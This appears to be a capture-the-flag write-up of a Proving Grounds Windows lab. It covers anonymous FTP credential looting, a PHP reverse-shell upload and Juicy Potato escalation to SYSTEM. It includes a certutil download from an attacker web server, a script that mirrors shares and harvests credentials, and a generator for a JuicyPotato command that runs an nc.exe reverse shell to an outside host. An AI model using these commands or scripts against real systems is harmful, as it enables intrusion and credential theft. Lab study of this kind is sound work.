Difficulty – Intermediate
Platform – Proving Grounds Practice
Operating System – Windows
Focus Areas
- FTP Enumeration
- Credential Discovery
- Web Shell Upload
- Windows Enumeration
- Juicy Potato Exploitation
- Privilege Escalation
In this writeup, I leverage anonymous FTP access to uncover sensitive information and valid credentials for a Basic-Auth-protected web application. By uploading a PHP reverse shell through the same FTP service, I gain remote code execution and establish an initial foothold on the target. After local enumeration shows that the compromised account holds SeImpersonatePrivilege, I use Juicy Potato to abuse token impersonation and escalate to NT AUTHORITY\SYSTEM.
Recon & Enumeration
Enumeration plays a significant role in penetration testing: the more thoroughly you enumerate, the easier it is to get a foothold on the target.
First, check whether the target is reachable with the ping command:
ping Target_IP

The ping output shows that the target is reachable. (A host that drops ICMP is not necessarily down, so the port scan below is worth running either way.)
Next, run a port scan with Nmap, a popular port scanner that reports which ports are open together with service and version details. I ran a quick default scan first, then a full scan of all 65535 TCP ports (-p-):
nmap -sC -sV -O -oA nmap/initial 192.168.190.46
nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.190.46



The scans showed these ports open:
- 21/tcp FTP service running zFTPServer 6.0 with anonymous access enabled
- 242/tcp HTTP service running Apache httpd 2.2.21 (Win32) and PHP 5.3.8 (Basic Authentication enforced)
- 3145/tcp zFTPServer administration service exposed
- 3389/tcp Microsoft Remote Desktop Services (RDP)
- OS: Microsoft Windows Server 2008 R2 Enterprise
Next I checked the anonymous FTP share and found an accounts directory; inside it were the admin account details:

I downloaded all the files with mget * (note that mget does not recurse into subdirectories, so each directory has to be entered first):


Inspecting the files revealed credentials, most likely for the Basic-Auth-protected HTTP service on port 242:
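Mirroring an anonymous share and reading every file by hand is tedious. The following Python script is an added example, not the author's tooling from this writeup: it recursively downloads an anonymous FTP share with ftplib and flags lines that look like stored credentials. The host, the local loot directory and the sample account file are assumptions constructed for illustration; the real files on the box may use a different layout.

```python
#!/usr/bin/env python3
"""Mirror an anonymous FTP share and flag credential-looking lines.

Added example: not from the original writeup. The loot directory name and
the sample account file below are constructed for illustration.
"""
import io
import os
import re
import sys
from ftplib import FTP, error_perm

# Patterns that commonly mark secrets in config, backup and account files.
CRED_PATTERNS = [
    re.compile(r"\b(pass(word)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*(\S+)", re.I),
    re.compile(r"\b(user(name)?|login)\b\s*[:=]\s*(\S+)", re.I),
    re.compile(r"\$(apr1|1|2[aby]?|5|6)\$[./0-9A-Za-z]+\$[./0-9A-Za-z]+"),  # htpasswd/crypt hash
    re.compile(r"\b[0-9a-f]{32}\b", re.I),                                   # bare MD5-looking hash
]

# Constructed sample in the spirit of the account files on the share (not the real file).
SAMPLE_ACCOUNT_FILE = """\
[admin]
Username=admin
Password=Summer2019!
Home=C:\\xampp\\htdocs
"""


def find_credentials(text, source="<input>"):
    """Return (source, line_no, line) for every line matching a credential pattern."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if any(p.search(line) for p in CRED_PATTERNS):
            hits.append((source, n, line.strip()))
    return hits


def _is_dir(ftp, name):
    """ftplib has no portable 'is this a directory', so try to enter it and back out."""
    try:
        ftp.cwd(name)
        ftp.cwd("..")
        return True
    except error_perm:
        return False


def mirror_ftp(ftp, remote_dir, local_dir):
    """Recursively download remote_dir into local_dir; returns the local paths fetched.

    Unlike the ftp client's `mget *`, this descends into subdirectories.
    """
    fetched = []
    os.makedirs(local_dir, exist_ok=True)
    ftp.cwd(remote_dir)
    for name in ftp.nlst():
        if name in (".", ".."):
            continue
        local_path = os.path.join(local_dir, name)
        if _is_dir(ftp, name):
            fetched += mirror_ftp(ftp, name, local_path)
            ftp.cwd("..")
        else:
            with open(local_path, "wb") as fh:
                ftp.retrbinary("RETR " + name, fh.write)
            fetched.append(local_path)
    return fetched


def main(host):
    with FTP(host, timeout=10) as ftp:
        ftp.login()  # anonymous login
        files = mirror_ftp(ftp, "/", "loot")
    for path in files:
        with open(path, errors="replace") as fh:
            for src, n, line in find_credentials(fh.read(), path):
                print(f"{src}:{n}: {line}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "192.168.190.46")
```

Run it as `python3 ftp_loot.py 192.168.190.46`; everything lands under ./loot and any flagged lines are printed with their file and line number. The patterns are deliberately broad (a bare 32-hex string will match), so treat the output as a shortlist to read, not as a result.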


The credentials worked against the Basic Authentication prompt on port 242:

Exploitation
Next I generated a PHP reverse shell with revshell:

I uploaded the shell over FTP into a location that the web application on port 242 serves:


Then I started a netcat listener, triggered the uploaded shell and obtained a foothold:



The local.txt flag was found.
Privilege Escalation
Now it was time to escalate privileges.
whoami /priv showed that SeImpersonatePrivilege was enabled. systeminfo also reported Windows Server 2008 Standard, so I chose the x86 build of Juicy Potato for privilege escalation:
https://github.com/ivanitlearning/Juicy-Potato-x86/releases

I hosted it with a Python HTTP server:

I used the Windows CertUtil utility to download Juicy Potato from my web server with the following command, then executed it:
certutil -urlcache -split -f http://192.168.45.156/Juicy.Potato.x86.exe

I first ran it without the -c CLSID parameter, so Juicy Potato used its default CLSID. A CLSID (Class Identifier) is a 128-bit GUID that Microsoft's COM (Component Object Model) uses to identify a specific COM class; Juicy Potato needs one that belongs to a service running as SYSTEM on this particular OS version. I chose 1250 as the local COM listener port (-l) for no particular reason and used -p to specify the program to run with elevated privileges:
The default CLSID didn't work:

I used the following list to look for alternative CLSIDs:
https://github.com/ohpe/juicy-potato/tree/master/CLSID/
The target appears to be running Windows Server 2008 R2 Enterprise, so I picked a CLSID from that OS's list, and it worked.
I then used it to spawn a reverse shell with the nc binary:


The above image shows the proof.txt file.
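To make the privilege check and the Juicy Potato invocation repeatable, the following Python script is an added example (not the author's commands): it parses `whoami /priv` output for the two privileges the potato family needs, builds the JuicyPotato command line for an nc.exe reverse shell, and emits a batch file that tests candidate CLSIDs with the tool's -z flag (test the CLSID only, launch nothing) before committing to one. The sample `whoami /priv` text is constructed, the nc.exe path and ports are assumptions, and the example CLSID is the BITS CLSID that JuicyPotato's README names as its default; any CLSID you actually use should come from the list linked above.

```python
#!/usr/bin/env python3
"""Check token privileges and build JuicyPotato command lines.

Added example, not from the original writeup. The whoami sample is
constructed; paths, ports and CLSIDs are assumptions to replace per target.
"""
import re

# Constructed sample of `whoami /priv` for a service account (not captured from the box).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Either privilege lets a potato turn the SYSTEM token it captures into a SYSTEM process.
POTATO_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

CLSID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


def parse_privileges(text):
    """Map privilege name -> 'Enabled'/'Disabled' from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def potato_viable(privs):
    """Return the usable privileges. A 'Disabled' one is still held by the token
    and can be enabled, so presence rather than state is what matters."""
    return [p for p in POTATO_PRIVS if p in privs]


def juicy_potato_cmd(exe, lhost, lport, clsid=None, listen_port=1250,
                     nc=r"C:\Windows\Temp\nc.exe"):
    """JuicyPotato command line for an nc.exe reverse shell.

    -t *  try both CreateProcessWithTokenW and CreateProcessAsUser
    -p    program to run as SYSTEM      -a  its arguments
    -l    local COM listener port       -c  CLSID (omitted = tool default)
    """
    if clsid is not None and not CLSID_RE.match(clsid):
        raise ValueError("CLSID must look like {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}")
    parts = [exe, "-t", "*", "-l", str(listen_port),
             "-p", r"C:\Windows\System32\cmd.exe",
             "-a", f'"/c {nc} {lhost} {lport} -e cmd.exe"']
    if clsid:
        parts += ["-c", clsid]
    return " ".join(parts)


def clsid_test_batch(exe, clsids, listen_port=1250):
    """Emit a .bat that tries each candidate CLSID with -z (test only, no program launched)."""
    lines = ["@echo off"]
    for c in clsids:
        if not CLSID_RE.match(c):
            raise ValueError(f"bad CLSID: {c}")
        lines.append(f"echo Testing {c}")
        lines.append(f"{exe} -z -l {listen_port} -c {c}")
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    privs = parse_privileges(SAMPLE_WHOAMI_PRIV)
    print("usable:", potato_viable(privs))
    # BITS, JuicyPotato's documented default CLSID; replace with one from the OS-specific list.
    print(juicy_potato_cmd("JuicyPotato.exe", "192.168.45.156", 4444,
                           clsid="{4991d34b-80a1-4291-83b6-3328366b9097}"))
```

Paste the real `whoami /priv` output in place of the sample, write the batch from clsid_test_batch to the target and run it; the first CLSID that reports success is the one to pass with -c.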
Key Takeaways
- Anonymous services often expose more information than intended and can become a valuable starting point for an attack chain.
- Credentials may be scattered across configuration files, backups, and authentication-related artifacts, making comprehensive enumeration critical.
- Weak or reused passwords can quickly transform information disclosure into full application compromise.
- File upload functionality should be strictly controlled and validated to prevent arbitrary code execution.
- Accurate operating system identification helps narrow down viable privilege escalation techniques.
- The presence of SeImpersonatePrivilege can significantly increase the impact of a compromised service account.
- Modern attacks frequently rely on chaining multiple low-to-medium severity issues rather than a single critical vulnerability.
- Methodical enumeration at every stage often reveals the path to compromise more effectively than aggressive exploitation attempts.